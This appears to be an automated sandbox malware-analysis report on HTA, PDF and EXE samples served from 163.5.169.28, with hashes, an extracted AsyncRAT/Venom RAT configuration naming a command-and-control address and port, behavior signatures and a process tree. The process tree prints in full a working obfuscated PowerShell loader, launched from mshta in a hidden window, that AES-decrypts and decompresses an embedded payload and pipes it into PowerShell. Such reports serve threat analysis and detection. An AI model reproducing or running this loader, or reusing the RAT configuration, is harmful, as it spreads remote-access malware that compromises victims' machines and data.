Overview
overview
10Static
static
10163.5.169....r2.hta
windows7-x64
3163.5.169....r2.hta
windows10-2004-x64
8163.5.169....r2.pdf
windows7-x64
1163.5.169....r2.pdf
windows10-2004-x64
1163.5.169....r3.hta
windows7-x64
3163.5.169....r3.hta
windows10-2004-x64
10163.5.169....r3.pdf
windows7-x64
1163.5.169....r3.pdf
windows10-2004-x64
1163.5.169....r4.hta
windows7-x64
3163.5.169....r4.hta
windows10-2004-x64
7163.5.169....r4.pdf
windows7-x64
1163.5.169....r4.pdf
windows10-2004-x64
1163.5.169....r5.hta
windows7-x64
3163.5.169....r5.hta
windows10-2004-x64
10163.5.169....r5.pdf
windows7-x64
1163.5.169....r5.pdf
windows10-2004-x64
1163.5.169....r2.hta
windows7-x64
3163.5.169....r2.hta
windows10-2004-x64
7163.5.169....er.hta
windows7-x64
3163.5.169....er.hta
windows10-2004-x64
8163.5.169....r2.hta
windows7-x64
3163.5.169....r2.hta
windows10-2004-x64
1163.5.169....ry.gif
windows7-x64
1163.5.169....ry.gif
windows10-2004-x64
1163.5.169....nk.gif
windows7-x64
1163.5.169....nk.gif
windows10-2004-x64
1163.5.169.28/cmd.exe
windows7-x64
163.5.169.28/cmd.exe
windows10-2004-x64
1163.5.169.28/cmt.exe
windows7-x64
1163.5.169.28/cmt.exe
windows10-2004-x64
1163.5.169.28/fd1.exe
windows7-x64
10163.5.169.28/fd1.exe
windows10-2004-x64
10Analysis
-
max time kernel
12s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
10-01-2024 21:28
Behavioral task
behavioral1
Sample
163.5.169.28/SCAN-atoletter2.hta
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
163.5.169.28/SCAN-atoletter2.hta
Resource
win10v2004-20231215-en
Behavioral task
behavioral3
Sample
163.5.169.28/SCAN-atoletter2.pdf
Resource
win7-20231215-en
Behavioral task
behavioral4
Sample
163.5.169.28/SCAN-atoletter2.pdf
Resource
win10v2004-20231222-en
Behavioral task
behavioral5
Sample
163.5.169.28/SCAN-atoletter3.hta
Resource
win7-20231215-en
Behavioral task
behavioral6
Sample
163.5.169.28/SCAN-atoletter3.hta
Resource
win10v2004-20231215-en
Behavioral task
behavioral7
Sample
163.5.169.28/SCAN-atoletter3.pdf
Resource
win7-20231215-en
Behavioral task
behavioral8
Sample
163.5.169.28/SCAN-atoletter3.pdf
Resource
win10v2004-20231222-en
Behavioral task
behavioral9
Sample
163.5.169.28/SCAN-atoletter4.hta
Resource
win7-20231129-en
Behavioral task
behavioral10
Sample
163.5.169.28/SCAN-atoletter4.hta
Resource
win10v2004-20231215-en
Behavioral task
behavioral11
Sample
163.5.169.28/SCAN-atoletter4.pdf
Resource
win7-20231129-en
Behavioral task
behavioral12
Sample
163.5.169.28/SCAN-atoletter4.pdf
Resource
win10v2004-20231215-en
Behavioral task
behavioral13
Sample
163.5.169.28/SCAN-atoletter5.hta
Resource
win7-20231215-en
Behavioral task
behavioral14
Sample
163.5.169.28/SCAN-atoletter5.hta
Resource
win10v2004-20231215-en
Behavioral task
behavioral15
Sample
163.5.169.28/SCAN-atoletter5.pdf
Resource
win7-20231215-en
Behavioral task
behavioral16
Sample
163.5.169.28/SCAN-atoletter5.pdf
Resource
win10v2004-20231215-en
Behavioral task
behavioral17
Sample
163.5.169.28/ato_letter2.hta
Resource
win7-20231215-en
Behavioral task
behavioral18
Sample
163.5.169.28/ato_letter2.hta
Resource
win10v2004-20231222-en
Behavioral task
behavioral19
Sample
163.5.169.28/atoletter.hta
Resource
win7-20231129-en
Behavioral task
behavioral20
Sample
163.5.169.28/atoletter.hta
Resource
win10v2004-20231222-en
Behavioral task
behavioral21
Sample
163.5.169.28/atoletter2.hta
Resource
win7-20231215-en
Behavioral task
behavioral22
Sample
163.5.169.28/atoletter2.hta
Resource
win10v2004-20231215-en
Behavioral task
behavioral23
Sample
163.5.169.28/binary.gif
Resource
win7-20231129-en
Behavioral task
behavioral24
Sample
163.5.169.28/binary.gif
Resource
win10v2004-20231215-en
Behavioral task
behavioral25
Sample
163.5.169.28/blank.gif
Resource
win7-20231215-en
Behavioral task
behavioral26
Sample
163.5.169.28/blank.gif
Resource
win10v2004-20231215-en
Behavioral task
behavioral27
Sample
163.5.169.28/cmd.exe
Resource
win7-20231215-en
Behavioral task
behavioral28
Sample
163.5.169.28/cmd.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral29
Sample
163.5.169.28/cmt.exe
Resource
win7-20231215-en
Behavioral task
behavioral30
Sample
163.5.169.28/cmt.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral31
Sample
163.5.169.28/fd1.exe
Resource
win7-20231129-en
Behavioral task
behavioral32
Sample
163.5.169.28/fd1.exe
Resource
win10v2004-20231222-en
General
-
Target
163.5.169.28/SCAN-atoletter5.hta
-
Size
1.1MB
-
MD5
415d6911c9a6e92b5d3f050668592357
-
SHA1
3f5ddfb1475a25201e443c61e31382100e8ddbae
-
SHA256
87b6bcaa19c9631310bb28100e1ed2c9f2b982fa5aaef48186da150d8d1c4ac3
-
SHA512
6b322e26c4724efa648713c665d6eddc4f2191d9f3a7764076ae8fc8d5f13fd2301238e7aade65b49db71b0ecadd9333af42cfa7e98ae54b554a99eafc45a055
-
SSDEEP
1536:zA8mj3XPCeaTTQT7L/1rTrZwsvCPA68WStimr/l1vcmafSIm+lIWFiWCK4vLwwlY:zA8mrfFITQTH/1rTrZ/CPArtQ
Malware Config
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.2
Default
5.182.87.154:4449
jiqsvporltpvroy
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\Control Panel\International\Geo\Nation mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1628 powershell.exe 1628 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1628 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 3488 wrote to memory of 1628 3488 mshta.exe 90 PID 3488 wrote to memory of 1628 3488 mshta.exe 90 PID 3488 wrote to memory of 1628 3488 mshta.exe 90 PID 1628 wrote to memory of 1444 1628 powershell.exe 113 PID 1628 wrote to memory of 1444 1628 powershell.exe 113 PID 1628 wrote to memory of 1444 1628 powershell.exe 113 PID 1444 wrote to memory of 4728 1444 CompPkgSrv.exe 96 PID 1444 wrote to memory of 4728 1444 CompPkgSrv.exe 96 PID 1444 wrote to memory of 4728 1444 CompPkgSrv.exe 96 PID 1444 wrote to memory of 3464 1444 CompPkgSrv.exe 115 PID 1444 wrote to memory of 3464 1444 CompPkgSrv.exe 115 PID 1444 wrote to memory of 3464 1444 CompPkgSrv.exe 115
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\163.5.169.28\SCAN-atoletter5.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3488 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $yZFZU = 'AAAAAAAAAAAAAAAAAAAAABE/loWPunGVG3vSzIF+4gYYuSdi25LjA3R2sRH3ANApHSXuf8bMyC29pivChWpQUF5jwS5PApifdJjbv9vkn9DXSM/2JUYmdCYx5xVByfj6pJkMegF8zwFSo8ZK3if0l/4GDPyqshuCBy2VboNRKWl2p1X2wR5J/tGkqskOVoRV3QhNnczAnEf7CRFM1Is/fdf8XSHRubMBIegNiKhoMT1yK8XvCRkWspIFFLru1FAD1Tg8XS8hfxzJUo+IMPHy+J5oTh+lTZwOZakD7TqP4Xzzik8o63NllXciiYBuevivvXZZr+HcVIgajF1z3oX4UsK+7MGliiTTvOJi1VOFAs78fIyHSsOZILhUXxYy7eZCv6zcnay7/rblIpr37qEjWFrFTxJrDCWp9YtfLzZc7b92SprQ5byOTP7PWUhcfuxubcAZXSaei2P6+m8vsNlMODSdhRkDYjzzdvO4sxrk0K6z/maPnACOkYyHI31Y8T1dYS7bXlq67DvZCqMUKg0rsj57gecSAFYjJEjQWAKcsBsRFffl9H53XWNqeXBuKXZxxa0ynQYXAcFtg9xVpjNBjS2+dkWCgPzYxTbP2CyH+Rq++bYuh6VceUfqx+txd5dRFF66O86UOmD+UADlA493qnFc7E8MNauW7Xe2rE83WcmgDH2dlqTL08iguTVfV5/fdb2BOrX7G2jBgqdD5nYvk3+8CVRlLEshXPMD8nMvXD+kdwOoH2QrJshtBLc71bgjc9yTWJFCQU0kVOUCuFP6VmmNHo2lHZ5qqsXgvDfKKalBncPVo5+5vvLnNCMTeOItEFo/OuvVdc7dryTs3ZI5GPGkyiys6MpgGWIVfP9LPNm3mr6ZHiFETvBOcE0bJsJmPvPeL8rQGUGdZdZ1hbrIzo/8rBWelUO2l4N6Fvh2sSVcyxQeAGRdUNs0c7I+WzywCuWFVtVQyKA3uyPZP9DpQiy2D598sKkcFbMNZQ7wMpZKNLYqysKmEr4OwnHBYs4WhQCGPFPt2RkbwPLeqi25Qw==';$UmUBU = 'THVtZ1BydlRUVHNScG5hU0plckh1cmtOUHlBclZZblo=';$PaMSUA = New-Object 'System.Security.Cryptography.AesManaged';$PaMSUA.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PaMSUA.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PaMSUA.BlockSize = 128;$PaMSUA.KeySize = 256;$PaMSUA.Key = [System.Convert]::FromBase64String($UmUBU);$UiOuV = [System.Convert]::FromBase64String($yZFZU);$GvFGJiWe = $UiOuV[0..15];$PaMSUA.IV = $GvFGJiWe;$JMerDVEst = $PaMSUA.CreateDecryptor();$LmLcRliha = $JMerDVEst.TransformFinalBlock($UiOuV, 16, $UiOuV.Length - 16);$PaMSUA.Dispose();$nJoMQCa = New-Object System.IO.MemoryStream( , $LmLcRliha );$QIpvRfP = New-Object System.IO.MemoryStream;$sWecTZomO = New-Object System.IO.Compression.GzipStream $nJoMQCa, ([IO.Compression.CompressionMode]::Decompress);$sWecTZomO.CopyTo( $QIpvRfP );$sWecTZomO.Close();$nJoMQCa.Close();[byte[]] $XhBgIX = $QIpvRfP.ToArray();$oKWZi = [System.Text.Encoding]::UTF8.GetString($XhBgIX);$oKWZi | powershell - }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c powershell.exe $yZFZU = 'AAAAAAAAAAAAAAAAAAAAABE/loWPunGVG3vSzIF+4gYYuSdi25LjA3R2sRH3ANApHSXuf8bMyC29pivChWpQUF5jwS5PApifdJjbv9vkn9DXSM/2JUYmdCYx5xVByfj6pJkMegF8zwFSo8ZK3if0l/4GDPyqshuCBy2VboNRKWl2p1X2wR5J/tGkqskOVoRV3QhNnczAnEf7CRFM1Is/fdf8XSHRubMBIegNiKhoMT1yK8XvCRkWspIFFLru1FAD1Tg8XS8hfxzJUo+IMPHy+J5oTh+lTZwOZakD7TqP4Xzzik8o63NllXciiYBuevivvXZZr+HcVIgajF1z3oX4UsK+7MGliiTTvOJi1VOFAs78fIyHSsOZILhUXxYy7eZCv6zcnay7/rblIpr37qEjWFrFTxJrDCWp9YtfLzZc7b92SprQ5byOTP7PWUhcfuxubcAZXSaei2P6+m8vsNlMODSdhRkDYjzzdvO4sxrk0K6z/maPnACOkYyHI31Y8T1dYS7bXlq67DvZCqMUKg0rsj57gecSAFYjJEjQWAKcsBsRFffl9H53XWNqeXBuKXZxxa0ynQYXAcFtg9xVpjNBjS2+dkWCgPzYxTbP2CyH+Rq++bYuh6VceUfqx+txd5dRFF66O86UOmD+UADlA493qnFc7E8MNauW7Xe2rE83WcmgDH2dlqTL08iguTVfV5/fdb2BOrX7G2jBgqdD5nYvk3+8CVRlLEshXPMD8nMvXD+kdwOoH2QrJshtBLc71bgjc9yTWJFCQU0kVOUCuFP6VmmNHo2lHZ5qqsXgvDfKKalBncPVo5+5vvLnNCMTeOItEFo/OuvVdc7dryTs3ZI5GPGkyiys6MpgGWIVfP9LPNm3mr6ZHiFETvBOcE0bJsJmPvPeL8rQGUGdZdZ1hbrIzo/8rBWelUO2l4N6Fvh2sSVcyxQeAGRdUNs0c7I+WzywCuWFVtVQyKA3uyPZP9DpQiy2D598sKkcFbMNZQ7wMpZKNLYqysKmEr4OwnHBYs4WhQCGPFPt2RkbwPLeqi25Qw==';$UmUBU = 'THVtZ1BydlRUVHNScG5hU0plckh1cmtOUHlBclZZblo=';$PaMSUA = New-Object 'System.Security.Cryptography.AesManaged';$PaMSUA.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PaMSUA.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PaMSUA.BlockSize = 128;$PaMSUA.KeySize = 256;$PaMSUA.Key = [System.Convert]::FromBase64String($UmUBU);$UiOuV = [System.Convert]::FromBase64String($yZFZU);$GvFGJiWe = $UiOuV[0..15];$PaMSUA.IV = $GvFGJiWe;$JMerDVEst = $PaMSUA.CreateDecryptor();$LmLcRliha = $JMerDVEst.TransformFinalBlock($UiOuV, 16, $UiOuV.Length - 16);$PaMSUA.Dispose();$nJoMQCa = New-Object System.IO.MemoryStream( , $LmLcRliha );$QIpvRfP = New-Object System.IO.MemoryStream;$sWecTZomO = New-Object System.IO.Compression.GzipStream $nJoMQCa, ([IO.Compression.CompressionMode]::Decompress);$sWecTZomO.CopyTo( $QIpvRfP );$sWecTZomO.Close();$nJoMQCa.Close();[byte[]] $XhBgIX = $QIpvRfP.ToArray();$oKWZi = [System.Text.Encoding]::UTF8.GetString($XhBgIX);$oKWZi | powershell -3⤵PID:1444
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -1⤵PID:3464
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\SCAN-atoletter5.pdf"2⤵PID:3588
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140433⤵PID:4704
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=07748823BD5D778384453806FBB0BA60 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=07748823BD5D778384453806FBB0BA60 --renderer-client-id=2 --mojo-platform-channel-handle=1776 --allow-no-sandbox-job /prefetch:14⤵PID:2092
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=036C4AC04809167F6F4D875F0A123E5C --mojo-platform-channel-handle=1760 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵PID:4904
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=977CBCE07E3FF1B6183BDA0B0871AFEF --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=977CBCE07E3FF1B6183BDA0B0871AFEF --renderer-client-id=4 --mojo-platform-channel-handle=2160 --allow-no-sandbox-job /prefetch:14⤵PID:1868
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F59B6AEC370137E63E8FE001BE6A5B54 --mojo-platform-channel-handle=2560 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵PID:2596
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=3CEDF23A7587B578A79CAC5E7E12B700 --mojo-platform-channel-handle=2568 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵PID:3464
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=669A3A96E1CA2888D802B79ADC029C43 --mojo-platform-channel-handle=1964 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵PID:60
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe $yZFZU = 'AAAAAAAAAAAAAAAAAAAAABE/loWPunGVG3vSzIF+4gYYuSdi25LjA3R2sRH3ANApHSXuf8bMyC29pivChWpQUF5jwS5PApifdJjbv9vkn9DXSM/2JUYmdCYx5xVByfj6pJkMegF8zwFSo8ZK3if0l/4GDPyqshuCBy2VboNRKWl2p1X2wR5J/tGkqskOVoRV3QhNnczAnEf7CRFM1Is/fdf8XSHRubMBIegNiKhoMT1yK8XvCRkWspIFFLru1FAD1Tg8XS8hfxzJUo+IMPHy+J5oTh+lTZwOZakD7TqP4Xzzik8o63NllXciiYBuevivvXZZr+HcVIgajF1z3oX4UsK+7MGliiTTvOJi1VOFAs78fIyHSsOZILhUXxYy7eZCv6zcnay7/rblIpr37qEjWFrFTxJrDCWp9YtfLzZc7b92SprQ5byOTP7PWUhcfuxubcAZXSaei2P6+m8vsNlMODSdhRkDYjzzdvO4sxrk0K6z/maPnACOkYyHI31Y8T1dYS7bXlq67DvZCqMUKg0rsj57gecSAFYjJEjQWAKcsBsRFffl9H53XWNqeXBuKXZxxa0ynQYXAcFtg9xVpjNBjS2+dkWCgPzYxTbP2CyH+Rq++bYuh6VceUfqx+txd5dRFF66O86UOmD+UADlA493qnFc7E8MNauW7Xe2rE83WcmgDH2dlqTL08iguTVfV5/fdb2BOrX7G2jBgqdD5nYvk3+8CVRlLEshXPMD8nMvXD+kdwOoH2QrJshtBLc71bgjc9yTWJFCQU0kVOUCuFP6VmmNHo2lHZ5qqsXgvDfKKalBncPVo5+5vvLnNCMTeOItEFo/OuvVdc7dryTs3ZI5GPGkyiys6MpgGWIVfP9LPNm3mr6ZHiFETvBOcE0bJsJmPvPeL8rQGUGdZdZ1hbrIzo/8rBWelUO2l4N6Fvh2sSVcyxQeAGRdUNs0c7I+WzywCuWFVtVQyKA3uyPZP9DpQiy2D598sKkcFbMNZQ7wMpZKNLYqysKmEr4OwnHBYs4WhQCGPFPt2RkbwPLeqi25Qw==';$UmUBU = 'THVtZ1BydlRUVHNScG5hU0plckh1cmtOUHlBclZZblo=';$PaMSUA = New-Object 'System.Security.Cryptography.AesManaged';$PaMSUA.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PaMSUA.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PaMSUA.BlockSize = 128;$PaMSUA.KeySize = 256;$PaMSUA.Key = [System.Convert]::FromBase64String($UmUBU);$UiOuV = [System.Convert]::FromBase64String($yZFZU);$GvFGJiWe = $UiOuV[0..15];$PaMSUA.IV = $GvFGJiWe;$JMerDVEst = $PaMSUA.CreateDecryptor();$LmLcRliha = $JMerDVEst.TransformFinalBlock($UiOuV, 16, $UiOuV.Length - 16);$PaMSUA.Dispose();$nJoMQCa = New-Object System.IO.MemoryStream( , $LmLcRliha );$QIpvRfP = New-Object System.IO.MemoryStream;$sWecTZomO = New-Object System.IO.Compression.GzipStream $nJoMQCa, ([IO.Compression.CompressionMode]::Decompress);$sWecTZomO.CopyTo( $QIpvRfP );$sWecTZomO.Close();$nJoMQCa.Close();[byte[]] $XhBgIX = $QIpvRfP.ToArray();$oKWZi = [System.Text.Encoding]::UTF8.GetString($XhBgIX);$oKWZi1⤵PID:4728
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:1444
-
C:\Users\Admin\AppData\Roaming\fd1.exeC:\Users\Admin\AppData\Roaming\fd1.exe1⤵PID:3196
-
C:\Users\Admin\AppData\Roaming\fd1.exeC:\Users\Admin\AppData\Roaming\fd1.exe2⤵PID:5748
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
36KB
MD5b30d3becc8731792523d599d949e63f5
SHA119350257e42d7aee17fb3bf139a9d3adb330fad4
SHA256b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3
SHA512523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e
-
Filesize
56KB
MD5752a1f26b18748311b691c7d8fc20633
SHA1c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
SHA256111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
SHA512a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5
-
Filesize
64KB
MD5d985214b5bfc573421cb6c05973acd0e
SHA1825a630d5551d5af292c33f077c6299b661d725a
SHA25600f97c7d7b529d384096264afac495ab7e2f38c823354035956446dee484f877
